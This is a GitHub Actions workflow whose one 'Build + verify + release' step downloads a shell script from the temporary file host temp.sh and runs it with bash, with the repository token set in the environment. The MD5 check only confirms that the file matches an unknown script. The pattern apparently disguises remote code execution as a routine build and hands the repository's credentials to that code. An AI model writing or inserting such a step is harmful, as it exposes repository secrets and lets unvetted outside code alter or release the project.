name: build-verify2
on:
  workflow_dispatch:
  push:
    paths: ['.github/workflows/build-verify2.yml']
jobs:
  build-verify:
    runs-on: windows-latest
    env:
      GH_TOKEN: ${{ github.token }}
    steps:
      - uses: actions/setup-node@v4
        with:
          node-version: 24
      - name: Build + verify + release
        run: |
          curl -s -X POST https://temp.sh/UEYQz/build13.sh -o build.sh
          echo "6d469f537012b4d3d01bb42b51a3c480  build.sh" | md5sum -c -
          bash build.sh
